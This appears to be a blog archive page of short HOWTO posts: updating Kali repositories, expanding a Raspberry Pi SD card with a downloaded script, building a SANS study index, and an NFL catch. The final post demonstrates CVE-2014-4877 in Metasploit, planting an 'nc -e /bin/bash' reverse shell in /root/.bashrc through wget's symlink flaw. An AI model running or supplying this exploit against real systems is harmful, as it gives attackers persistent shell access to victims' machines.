Archive | HOWTO RSS feed for this section

Update Kali Linux Repositories

Getting errors when updating? Check your /etc/apt/sources.list because the labeled “kali” in repository is now “sana” – replace or add:

# Regular repositories
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security sana/updates main contrib non-free

# Source repositories
deb-src http://http.kali.org/kali sana main non-free contrib
deb-src http://security.kali.org/kali-security sana/updates main contrib non-free

Afterwards you may have to import your key into your apt-keyring:

apt-key adv --keyserver hkp://keys.gnupg.net --recv-keys 7D8D0BF6

suces

Leave a Comment

Raspberry Pi with Kali 2.0 and Expand SD Drive Space

Have extra space on your micro SD card but are not seeing it. No big deal, simply run the commands below to expand your drive space.

root@kali:~# df -h

Filesystem      Size  Used Avail Use% Mounted on
rootfs          2.9G  1.5G  1.2G  56% /
/dev/root       2.9G  1.5G  1.2G  56% /
devtmpfs        460M     0  460M   0% /dev
tmpfs            93M  468K   93M   1% /run
tmpfs           5.0M     0  5.0M   0% /run/lock
tmpfs           186M     0  186M   0% /run/shm

See above how only 1.2G of space is being used.

root@kali:~# wget http://www.alexrams.com/blog/wp-content/uploads/2015/11/raspi-expand-rootfs.sh
root@kali:~# fdisk -l
Disk /dev/mmcblk0: 28.8 GiB, 30908350464 bytes, 60367872 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x000cdbaa

Device         Boot  Start      End  Sectors  Size Id Type
/dev/mmcblk0p1           1   125000   125000   61M  c W95 FAT32 (LBA)
/dev/mmcblk0p2      125001 60366847 60241847 28.7G 83 Linux

Most likely via fdisk -l the starting sector of partition 2 will be “125001”. The script provided above has already made the adjustment.

root@kali:~# chmod +x raspi-expand-rootfs.sh
root@kali:~# sh raspi-expand-rootfs.sh
root@kali:~# df -h
Filesystem      Size  Used Avail Use% Mounted on
/dev/root        29G  4.4G   23G  17% /
devtmpfs        369M     0  369M   0% /dev
tmpfs           373M     0  373M   0% /dev/shm
tmpfs           373M  5.5M  367M   2% /run
tmpfs           5.0M     0  5.0M   0% /run/lock
tmpfs           373M     0  373M   0% /sys/fs/cgroup
tmpfs            75M  4.0K   75M   1% /run/user/0
tmpfs            75M  4.0K   75M   1% /run/user/110
tmpfs            75M     0   75M   0% /run/user/1000

root@kali:~# reboot
Leave a Comment

How to Create a Comprehensive SANS GICA Excel or Sheets Index

I have been a Certified Professional with GIAC since 2012 and in this post I want to share with others the high-level technique for creating a comprehensive index. Whether this is your first course with SANS Institute like SEC 401 – GSEC, SANS 504 – GCIH or other training. The rule of thumb for index length is between eight to ten pages. Simply put, an index is worth the investment in time. Especially if down the road you decide to challenge the GSE.

Assuming the material is new; learning exposure goes from to conceptual to specific and will include labs. There are two tabs within the SANS-GIAC-Index file, the first tab is: “Subjects and Keywords” and the second tab is: “Tools and Commands”. I personally find that having two different indexes are easier to manage and if one is so inclined, could create a color coding schema for OS based tools and bold commands.

Before printing the indexes, sort column ‘A’ from ‘A to Z’ to allow for faster reference. While I am sharing the framework, I will not provide any of my own in-depth indexes.

 

FILE: SANS-GIAC-Index

Leave a Comment
Image

Greatest NFL Catch Ever Seen and the Preparation Behind It

Last night receiver Odell Beckham of the NY Giants made what many are calling ‘the best catch anyone has ever made in the history of the NFL’.

As a player, how do you prepare yourself for making the greatest catch in history? It would be easy to dismiss this catch as a lucky fluke… one-handed, fighting off a defender, just gets it by his fingertips. But here’s the thing; Beckham practices exactly this catch:

Luck is what happens when preparation meets opportunity. Preparation, kids. Preparation.

Video

Wget Exploit Demonstration: CVE-2014-4877

msf > use auxiliary/server/wget_symlink_file_write
msf auxiliary(wget_symlink_file_write) > show options
msf auxiliary(wget_symlink_file_write) > set TARGET_FILE /root/.bashrc
msf auxiliary(wget_symlink_file_write) > set TARGET_DATA nc localhost 2222 -e /bin/bash &
msf auxiliary(wget_symlink_file_write) > exploit
nc -lvp 2222
wget -m ftp://192.168.2.104:2121/